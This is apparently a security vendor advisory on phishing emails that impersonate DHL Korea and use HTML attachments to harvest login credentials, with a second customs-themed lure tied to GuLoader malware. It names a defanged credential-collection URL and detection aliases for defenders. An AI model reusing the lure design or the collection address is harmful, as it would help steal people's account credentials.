ASEC (AhnLab Security Emergency response Center) has recently discovered malicious emails impersonating shipping companies being distributed in Korea. These emails prompt users to open the attached file with the subject ‘Submitting import clearance info’. Considering that the attached HTML’s filename starts with ‘DHL_Korea’, it can be concluded that the email is being distributed to Korean targets.
This disguised email has a login page in the attached HTML file. When a user logs in this page, an Excel file uploaded to a personal OneDrive cloud storage account is opened.
When a user opens the attached HTML, the login page they are connected to leaks the password they enter to the server below.
- Information leak address: hxxps://lucent-fittings.000webhostapp[.]com/action.php
After the user attempts to login, they are directed to an Excel file uploaded to a personal OneDrive cloud storage account. However, the Excel file connected to the link cannot be opened because it exceeds the file size limit. The screen that connects to the Excel file was designed to deceive users, making it difficult for users to immediately realize that they were phished after they entered their account credentials.
Similar to the aforementioned ‘Submitting import clearance info’ phishing email, another email that asks for users’ customs clearance verification status was found. When the attachment is opened, a screen that makes users believe they were connected to a PDF file can be seen. The URL connected to the Open button is currently inaccessible, but it has been confirmed that the GuLoader malware was downloaded when the address could be accessed.
Due to the recent distribution of phishing emails related to import clearance, users must be particularly cautious before entering their account credentials or when opening attached files. Currently, V3 products detect and block the files mentioned in this post using the following aliases.
- Phishing/HTML.FakeMS.S2082 (2023.01.19.00)
- Trojan/PDF.Generic (2023.02.10.02)
- Trojan/Win.GuLoader.C5379004 (2023.02.11.00)
[Relevant IOC Info]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.